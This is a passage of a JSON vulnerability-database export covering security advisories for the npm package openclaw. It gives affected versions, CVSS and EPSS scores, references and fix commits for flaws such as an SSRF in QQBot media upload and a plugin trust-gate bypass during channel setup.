k-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"
VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"
VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"
VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"
VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.12"}],"aliases":["GHSA-r7vr-gr74-94p8"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-njsr-j7vm-cqg8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89344?format=json","vulnerability_id":"VC
ID-nkh4-j2pe-1qhr","summary":"OpenClaw: QQBot direct media upload skipped URL SSRF validation\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nThe QQBot direct-upload media path could forward attacker-controlled image URLs without applying the SSRF validation used by the local download path. This could make configured QQBot media delivery request or relay URLs the operator did not intend to allow.\n\nThe affected path is limited to QQBot outbound media handling and does not expose arbitrary local files. Severity is low.\n\n## Fix\n\nOpenClaw now validates QQBot direct-upload media URLs before `uploadC2CMedia` and `uploadGroupMedia` direct-upload calls.\n\nFix commit:\n\n- `49db424c8001f2f419aad85f434894d8d85c1a09`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44117","reference_id":"","reference_type":"","scores":[{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12782","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12786","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.14064","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44117"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/49db424c8001f2f419aad85f434894d8d85c1a09","reference_id":"","referen
ce_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:33:16Z/"}],"url":"https://github.com/openclaw/openclaw/commit/49db424c8001f2f419aad85f434894d8d85c1a09"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-c4qg-j8jg-42q5","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:33:16Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-c4qg-j8jg-42q5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44117","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44117"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-in-qqbot-direct-media-upload","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scorin
g_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:33:16Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-in-qqbot-direct-media-upload"},{"reference_url":"https://github.com/advisories/GHSA-c4qg-j8jg-42q5","reference_id":"GHSA-c4qg-j8jg-42q5","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-c4qg-j8jg-42q5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109923?format=json","purl":"pkg:npm/openclaw@2026.4.20","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"}],"aliases":["CVE-2026-44117","GHSA-c4qg-j8jg-42q5"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nkh4-j2pe-1qhr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89245?format=json","vulnerability_id":"VCID-ns77-4wfj-9ka6","summary":"OpenClaw: Channel setup catalog lookups could include untrusted workspace plugin shadows\n## Summary\n\nChannel setup catalog lookups could 
include untrusted workspace plugin shadows.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nChannel setup could resolve a workspace plugin shadow before a bundled channel plugin, causing setup-time plugin loading without the intended trust gate.\n\n## Technical Details\n\nThe fix routes setup catalog lookups through trusted catalog paths and uses `excludeWorkspace: true` where setup should not include workspace shadows.\n\n## Fix\n\nThe issue was fixed in the advisory fix branch. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `1fede43b948df40ca8674511d4bd08d39f6c5837`\n- PR: private advisory fork\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this 
issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43571","reference_id":"","reference_type":"","scores":[{"value":"0.00047","scoring_system":"epss","scoring_elements":"0.15125","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17378","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17414","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43571"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/1fede43b948df40ca8674511d4bd08d39f6c5837","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T11:54:14Z/"}],"url":"https://github.com/openclaw/openclaw/commit/1fede43b948df40ca8674511d4bd08d39f6c5837"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-82qx-6vj7-p8m2","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scori
ng_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T11:54:14Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-82qx-6vj7-p8m2"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43571","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43571"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-untrusted-workspace-plugin-shadow-resolution-in-channel-setup","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T11:54:14Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-untrusted-workspace-plugin-shadow-resolution-in-channel-setup"}
,{"reference_url":"https://github.com/advisories/GHSA-82qx-6vj7-p8m2","reference_id":"GHSA-82qx-6vj7-p8m2","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-82qx-6vj7-p8m2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109896?format=json","purl":"pkg:npm/openclaw@2026.4.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-q3a2-qk5j-1yat"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa
-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"}],"aliases":["CVE-2026-43571","GHSA-82qx-6vj7-p8m2"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ns77-4wfj-9ka6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89423?format=json","vulnerability_id":"VCID-nszj-2u6y-xqcb","summary":"Duplicate Advisory: OpenClaw Bypasses DM Policy Separation via Synology Chat Webhook Path Collision\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-rqp8-q22p-5j9q. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.22 contains a webhook path route replacement vulnerability in the Synology Chat extension that allows attackers to collapse multi-account configurations onto shared webhook paths. 
Attackers can exploit inherited or duplicate webhook paths to bypass per-account DM access control policies and replace route ownership across accounts.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/980940aa58f862da4e19372597bbc2a9f268d70b","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/980940aa58f862da4e19372597bbc2a9f268d70b"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rqp8-q22p-5j9q","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_el